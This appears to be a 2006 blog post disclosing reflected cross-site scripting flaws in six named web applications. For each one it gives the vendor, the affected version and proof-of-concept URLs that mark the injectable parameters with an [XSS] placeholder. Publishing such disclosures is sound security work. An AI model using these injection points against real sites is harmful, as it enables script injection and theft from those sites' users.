ecoestadistica.com

Sunday, March 26, 2006

Vulnerabilities...

Web Quiz pro XSS vuln.
Vendor: www.calorisplanitia.com/online-quiz-system.aspx
Affected version: pro

Proof of concept:

/prequiz.asp?examid=1&exam=[XSS]
/student.asp?msg=[XSS]

---------------------------------------------------------------------------------------

E-School Management System XSS vuln.
Vendor: www.calorisplanitia.com/e-school-management-system.aspx
Affected version: 1.0 and earlier

Proof of concept:

/default.asp?msg=[XSS]

---------------------------------------------------------------------------------------

EZHomepagePro multiple XSS vuln.
Vendor: www.htmljunction.net/ezhomepagepro/index.asp
Affected version: v1.5 and earlier

Proof of concept:

/common/email.asp?page=user&m=y&select=mouse-&usid=2&uname=guest&aname=&adid=[XSS]
/common/email.asp?page=user&m=y&select=mouse-&usid=2&uname=&aname=[XSS]
/users/users_search.asp?page=user&uname=mouse&usid=2&aname=&adid=&m=[XSS]
/users/users_search.asp?page=user&uname=mouse&usid=2&aname=&adid=[XSS]
/users/users_search.asp?page=user&uname=mouse&usid=2&aname=[XSS]
/users/users_calendar.asp?view=yes&action=write&uname=mouse&usid=2&date=3/2/2006&sdate=3/2/2006&page=[XSS]
/users/users_profiles.asp?page=user&uname=mouse&usid=2&aname=&adid=[XSS]
/users/users_profiles.asp?page=user&uname=mouse&usid=2&aname=[XSS]
/users/users_mgallery.asp?gn=mouse&gp=guest&fl=Favorites&usid=[XSS]

--------------------------------------------------------------------------------------

WebAPP multiple XSS vuln.
Vendor: http://www.web-app.org/
Affected version: 0.9.9.3.2 and earlier

Proof of concept:

http://victim/cgi-bin/index.cgi?action=[XSS]
http://victim/cgi-bin/index.cgi?action=&id=[XSS]
http://victim/cgi-bin/index.cgi?action=forum&board=chitchat&op=&num=[XSS]
http://victim/cgi-bin/index.cgi?action=&board=[XSS]
http://victim/cgi-bin/index.cgi?action=&cat=[XSS]

--------------------------------------------------------------------------------------

BlankOL XSS vuln.
Vendor: http://www.blankol.com/
Affected version: 1 and earlier

Proof of concept:

/bol.cgi?file=[XSS]
/bol.cgi?function=[XSS]

--------------------------------------------------------------------------------------

Absolute Image Gallery XE 2.0 XSS vuln.

Vendor: http://www.xigla.com/absoluteig/index.htm
Affected version: V2.0 and earlier

Proof of concept:

/gallery.asp?action=viewimage&categoryid=8&text=&imageid=43&box=&shownew=[XSS]
